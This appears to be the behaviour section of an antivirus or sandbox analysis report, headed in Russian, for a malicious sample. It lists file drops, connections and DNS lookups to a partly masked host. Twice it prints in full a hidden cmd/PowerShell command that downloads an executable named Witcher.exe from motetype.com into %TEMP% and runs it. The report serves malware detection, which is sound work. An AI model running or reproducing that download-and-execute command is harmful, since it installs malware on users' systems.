Техническая информация
- http://motetype.com/1/index.php как %temp%\witcher.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://motetype.com/1/index.php','%TEMP%\Witcher.exe');Start-Process '%TEMP%\Witcher.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1940
- %TEMP%\1090899.cvr
- 'mo###ype.com':80
- 'mo###ype.com':443
- http://mo###ype.com/1/index.php
- 'mo###ype.com':443
- DNS ASK mo###ype.com
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://motetype.com/1/index.php','%TEMP%\Witcher.exe');Start-Process '%TEMP%\Witcher.exe';' (со скрытым окном)